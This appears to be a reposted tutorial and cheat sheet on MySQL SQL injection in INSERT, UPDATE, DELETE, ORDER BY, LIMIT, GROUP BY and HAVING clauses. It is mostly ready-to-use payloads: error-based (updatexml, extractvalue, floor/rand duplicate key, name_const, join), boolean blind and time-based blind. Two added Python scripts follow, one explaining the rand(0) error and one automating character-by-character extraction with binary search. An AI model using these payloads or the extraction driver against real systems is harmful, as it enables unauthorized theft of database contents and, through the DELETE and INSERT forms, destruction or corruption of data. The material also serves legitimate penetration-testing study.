Mysql Insert, Update, Delete, Order by, Group by injection

Source: Internet
Author: User
Tags: benchmark, mysql injection, mysql insert, rand, sha1

Insert:

Syntax: INSERT INTO table_name (column1, column2, ...) VALUES (value1, value2, ...)

Error injection:

The injected value sits inside the quoted name field. updatexml()/extractvalue() reject the XPath built by concat(), so the statement aborts with an error whose message carries the value (XPATH syntax error: '~test~'); nothing is inserted. The message shows at most 32 characters, so longer values have to be read in pieces with substr().

INSERT INTO test (id,name,pass) VALUES (6, 'xiaozi' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '', 'nervo');

INSERT INTO test (id,name,pass) VALUES (6, 'xiaozi' or extractvalue(1,concat(0x7e,database())) or '', 'nervo');

Blind injection:

The boolean blind variant rests on whether the expression placed between the two `or`s is true. The injected text is executed as part of the INSERT, and what the column ends up storing is the result of the whole `or` chain: the non-numeric string in front counts as 0, so the stored value is the truth value of the expression, 1 or 0. Read the row back (profile page, listing) to see which one was written. Note that every probe inserts a row.

' or 1=1 or '      -- expression true, stored value is 1
' or 1=2 or '      -- expression false, stored value is 0
' or exists(select * from information_schema.tables) or '      -- stored value is 1
aaa' or length(database())=4 or '      -- 1 (the database in this example is named test)
aaa' or mid(database(),1,1)='t' or '      -- 1
aaa' or mid(database(),1,11)='test' or '      -- 1 (a length past the end just returns the rest of the string)

INSERT INTO test (id,name,pass) VALUES (2, 'mis1', '' or ascii(mid(database(),1,1))=116 or '');

Time-based blind:

When the stored value cannot be read back, the same expression can be turned into a delay; the response is held for 5 seconds only when the first character of the database name is 'a':

INSERT INTO test (id,name,pass) VALUES (2, 'mis1', '' or if(mid(database(),1,1)='a',sleep(5),0) or '');

Update:

Here the injection is in the SET value; the empty string after the second `or` keeps the quoting intact. When the error-based payload fires, the statement aborts and the row is left unmodified.

UPDATE test SET pass='baidu' or updatexml(1,concat(0x7e,(version()),0x7e),0) or '' WHERE id=2 AND name='0';

UPDATE test SET pass='baidu' or extractvalue(1,concat(0x7e,database())) or '' WHERE id=2 AND name='0';

Delete:

Here the injection lands in the WHERE clause. The error aborts the statement before any row is removed. Do not use boolean blind payloads against a DELETE: a condition that evaluates true (or 1=1) deletes every row in the table.

DELETE FROM test WHERE id=2 or updatexml(1,concat(0x7e,(version()),0x7e),0) or '';

DELETE FROM test WHERE id=2 or extractvalue(1,concat(0x7e,database())) or '';

Order by:

ORDER BY [id]      -- injection point

A UNION cannot follow ORDER BY, but the sort expression may be any expression, so the group-by/rand(0) duplicate-key error can be raised from it:

SELECT username FROM users WHERE isadmin = 0 GROUP BY username ORDER BY 1 AND (SELECT COUNT(*) FROM information_schema.columns GROUP BY concat(version(),0x27202020,floor(rand(0)*2-1)))

ORDER BY [id] DESC/ASC      -- an injection point after the direction keyword is used the same way

Limit 0,1:

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT <injection point>

Error injection:

After ORDER BY ... LIMIT neither UNION nor a further WHERE is accepted, but PROCEDURE ANALYSE is, and its arguments are evaluated:

mysql> SELECT field FROM user WHERE id > 0 ORDER BY id LIMIT 0,1 PROCEDURE ANALYSE(extractvalue(rand(),concat(0x3a,version())),1);

If the injection point does not return errors, time-based injection works too, with this payload:

SELECT username FROM users WHERE isadmin = 0 LIMIT 0,1 PROCEDURE ANALYSE(extractvalue(rand(),concat(0x3a,(if(mid(database(),1,1) like 'w',benchmark(5000000,sha1(1)),5)))),1);

PROCEDURE ANALYSE was deprecated in MySQL 5.7.18 and removed in MySQL 8.0, so both LIMIT payloads only work against 5.x servers.

Group by:

GROUP BY username      -- injection point

SELECT username FROM users WHERE isadmin = 0 GROUP BY username AND (SELECT 1 FROM (SELECT COUNT(*), concat((SELECT (SELECT DISTINCT concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1) FROM information_schema.tables LIMIT 0,1), floor(rand(0)*2)) x FROM information_schema.tables GROUP BY x) a) #

Having:

HAVING 1=1      -- injection point

SELECT username FROM users WHERE isadmin = 0 GROUP BY username HAVING 1=1 AND (SELECT COUNT(*) FROM information_schema.columns GROUP BY concat(version(),0x27202020,floor(rand(0)*2-1)))

MySQL error-based injection:

1. Through the floor() duplicate-key error

rand(0) is seeded, so floor(rand(0)*2) produces the fixed sequence 0,1,1,0,1,1,... The GROUP BY temporary table evaluates the grouping key once to look a group up and again when it inserts a new group, so by the third source row MySQL tries to insert a key that already exists and fails with Duplicate entry '<version>1' for key 'group_key', leaking whatever was concatenated in front of the floor() value. The derived table must supply at least three rows; the three-row union in the second payload (1, NULL, !1 = 0) does exactly that.

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2)) x from information_schema.tables group by x) a);

and (select count(*) from (select 1 union select null union select !1) x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
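The following is an added example, not code from the original page: it re-implements MySQL's RAND(seed) generator in Python and simulates the GROUP BY temporary table, to show why the floor(rand(0)*2) payloads in this section, and the floor(rand(0)*2-1) variant used in the ORDER BY and HAVING payloads above, always end in a Duplicate entry error and why at least three source rows are needed. The generator constants are those of MySQL's my_rnd() and Item_func_rand seeding; the simulation, its two-evaluation model of the temporary table, and all function names are this example's own assumptions.

```python
# Added example (not from the original page): MySQL's RAND(seed) stream and a
# model of GROUP BY temporary-table filling, reproducing the floor(rand(0)*2)
# duplicate-key error.  Names below are this example's own.
import math
from typing import Dict, Iterator, List

MAX_VALUE = 0x3FFFFFFF  # rand_struct.max_value in MySQL's my_rnd()


def mysql_rand(seed: int) -> Iterator[float]:
    """Successive values of MySQL's RAND(seed).
    Seeding follows Item_func_rand::seed_random(); the step follows my_rnd()."""
    seed1 = (seed * 0x10001 + 55555555) % MAX_VALUE
    seed2 = (seed * 0x10000001) % MAX_VALUE
    while True:
        seed1 = (seed1 * 3 + seed2) % MAX_VALUE
        seed2 = (seed1 + seed2 + 33) % MAX_VALUE
        yield seed1 / MAX_VALUE


def floor_rand_keys(seed: int, n: int, mult: int = 2, offset: int = 0) -> List[int]:
    """floor(rand(seed)*mult+offset) for the first n calls.
    seed 0, mult 2 gives the fixed 0,1,1,0,1,1,... the payloads rely on;
    offset -1 gives the floor(rand(0)*2-1) variant from the ORDER BY/HAVING payloads."""
    stream = mysql_rand(seed)
    return [math.floor(next(stream) * mult + offset) for _ in range(n)]


class DuplicateEntry(Exception):
    """Stand-in for MySQL error 1062 (Duplicate entry ... for key 'group_key')."""


def simulate_group_by(rows: int, seed: int = 0, mult: int = 2, offset: int = 0) -> Dict[int, int]:
    """Model of how MySQL fills the GROUP BY temporary table (assumption of this
    example, matching the usual explanation of the trick): the grouping
    expression is evaluated once to look the group up and, when the group is
    new, evaluated again to build the row that gets inserted.  With a
    non-deterministic key the second value can collide with an existing group,
    and MySQL reports a duplicate key instead of merging the counts."""
    stream = mysql_rand(seed)
    table: Dict[int, int] = {}
    for row in range(1, rows + 1):
        k = math.floor(next(stream) * mult + offset)   # evaluation 1: lookup
        if k in table:
            table[k] += 1
            continue
        k = math.floor(next(stream) * mult + offset)   # evaluation 2: inserted row
        if k in table:
            raise DuplicateEntry(f"Duplicate entry '{k}' for key 'group_key' (source row {row})")
        table[k] = 1
    return table


def first_failing_row(max_rows: int = 10, seed: int = 0, mult: int = 2, offset: int = 0) -> int:
    """Smallest source-table size at which the payload errors, or 0 if it never does."""
    for rows in range(1, max_rows + 1):
        try:
            simulate_group_by(rows, seed, mult, offset)
        except DuplicateEntry:
            return rows
    return 0


if __name__ == "__main__":
    print(floor_rand_keys(0, 6))          # [0, 1, 1, 0, 1, 1]
    print(simulate_group_by(2))           # {1: 2}: two rows merge fine
    print(first_failing_row())            # 3: the third row collides
    print(first_failing_row(offset=-1))   # 3: the *2-1 variant behaves the same
```

Run it and the third source row is where the lookup key (0) misses and the re-evaluated insert key (1) collides with the group created by row one. That is why `information_schema.tables` (always more than three rows) is the usual FROM clause, and why a two-row derived table would return silently.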

2. extractvalue

and extractvalue(1,concat(0x5c,(select user())))

3. updatexml

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Both fail with XPATH syntax error because the leading 0x5c ('\') or 0x3a (':') makes the XPath invalid, and the value follows it in the message. The message is limited to 32 characters; read longer values with substr().

4. name_const injection

name_const() names its column after its first argument, so the two joined derived tables each have a column named after the version string and MySQL rejects the join with Duplicate column name '<version>'. Newer versions refuse @@version as a non-constant argument (Incorrect arguments to NAME_CONST), so this is a legacy technique.

and exists(select * from (select * from (select name_const(@@version,0)) a join (select name_const(@@version,0)) b) c)

5. join error injection

Joining a table to itself with no USING list duplicates every column name in the derived table, and the error names the first duplicate; each column added to USING() removes one duplicate, so the column names are recovered one at a time (here id first, then name):

mysql> SELECT * FROM (SELECT * FROM users a JOIN users b) c;
mysql> SELECT * FROM (SELECT * FROM users a JOIN users b USING (id)) c;

mysql> SELECT * FROM (SELECT * FROM users a JOIN users b USING (id,name)) c;

MySQL boolean blind injection:

#select * from test where id=2 and length(version())=6
#select * from test where id=2 and ascii(substring(version(),7,1))>1

#select * from test where id=2 and length(database())=4
#select * from test where id=2 and ascii(mid(database(),4,1))=116

#select * from test where id=2 and (select length(version()))=6
#select * from test where id=2 and (select count(*) from test)=3

MySQL time-based blind injection:

benchmark() burns CPU for a duration that depends on server load; sleep() delays a fixed time per row examined, so prefer sleep() where it is available.

#select * from test where id=2 and if(ascii(substring(user(),1,1))=114,benchmark(10000000,sha1(1)),0)
#select * from test where id=2 and if(ascii(substring(user(),1,1))=114,sleep(1),0)

#select * from test where id=2 and if(substring(user(),1,1)='r',sleep(5),0)
#select * from test where id=2 and if(substring(user(),1,1)=char(114),sleep(5),0)
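The following is an added example, not code from the original page: a script that drives the blind payloads from this section and from the INSERT blind section near the top (the `' or <expr> or '` wrapper for a quoted value, the ` and <expr>` wrapper for a numeric WHERE, and the if(...,sleep(n),0) time-based form), extracting a value character by character with a binary search on ascii(mid(...)) instead of one request per candidate character. The wrapper and comparison expressions are the page's; the function names, the probe shapes, and the fake oracle standing in for the HTTP round trip are this example's own assumptions.

```python
# Added example (not from the original page): drives the page's blind payloads
# with a binary search.  Function names and the fake oracle are this example's own.
import re
from typing import Callable

Oracle = Callable[[str], bool]  # sends one MySQL boolean expression, returns its truth


# --- payload builders: where the expression is placed ---------------------
def wrap_insert(expr: str) -> str:
    """For a quoted value in INSERT/UPDATE.  The non-numeric text before the
    first `or` counts as 0, so the column stores exactly the truth of expr."""
    return f"' or {expr} or '"


def wrap_where(expr: str) -> str:
    """For a numeric WHERE clause such as `where id=2<injection>`."""
    return f" and {expr}"


def as_time_based(expr: str, seconds: int = 5) -> str:
    """Same question, answered by a delay instead of a stored/visible value."""
    return f"if({expr},sleep({seconds}),0)"


# --- probes: the questions the search asks --------------------------------
def length_probe(source: str, threshold: int) -> str:
    return f"length({source})>{threshold}"


def char_probe(source: str, pos: int, threshold: int) -> str:
    """True when the pos-th character (1-based) of source has a code above threshold."""
    return f"ascii(mid({source},{pos},1))>{threshold}"


# --- search driver ---------------------------------------------------------
def binary_search(oracle: Oracle, probe: Callable[[int], str], lo: int, hi: int) -> int:
    """Finds the v in [lo, hi] for which probe(t) is true for t < v and false
    for t >= v, i.e. the hidden value, in about log2(hi-lo) requests."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(probe(mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_secret(oracle: Oracle, source: str = "database()", max_len: int = 64) -> str:
    """Recovers a MySQL expression's value (ASCII assumed), length first."""
    length = binary_search(oracle, lambda t: length_probe(source, t), 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        code = binary_search(oracle, lambda t, p=pos: char_probe(source, p, t), 0, 127)
        chars.append(chr(code))
    return "".join(chars)


# --- constructed stand-in for the HTTP round trip --------------------------
def fake_oracle_for(secret: str) -> Oracle:
    """Answers the two probe shapes above against a known value.  A real oracle
    would submit wrap_insert(expr) (or wrap_where(expr)) in the vulnerable
    field and report whether the stored value reads back as 1, or whether the
    time-based form delayed the response."""
    def oracle(expr: str) -> bool:
        m = re.fullmatch(r"ascii\(mid\(database\(\),(\d+),1\)\)>(\d+)", expr)
        if m:
            pos, thr = int(m.group(1)), int(m.group(2))
            return pos <= len(secret) and ord(secret[pos - 1]) > thr
        m = re.fullmatch(r"length\(database\(\)\)>(\d+)", expr)
        if m:
            return len(secret) > int(m.group(1))
        raise ValueError(f"unsupported probe: {expr}")
    return oracle


def count_requests(secret: str) -> int:
    """Number of boolean questions the search needs for a given secret."""
    base, calls = fake_oracle_for(secret), 0

    def counting(expr: str) -> bool:
        nonlocal calls
        calls += 1
        return base(expr)

    extract_secret(counting)
    return calls


if __name__ == "__main__":
    print(wrap_insert(char_probe("database()", 1, 100)))
    print(wrap_insert(as_time_based(char_probe("database()", 1, 100))))
    print(extract_secret(fake_oracle_for("test")), count_requests("test"))
```

Against the page's database named test the search needs 34 requests (6 for the length, 7 per character) where an equality scan like `ascii(mid(database(),1,1))=116` would need up to 128 per character. Remember that with the INSERT wrapper every request writes a row, and that the `ascii(...)>n` comparison only recovers ASCII names; swap in ord() for multi-byte values.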
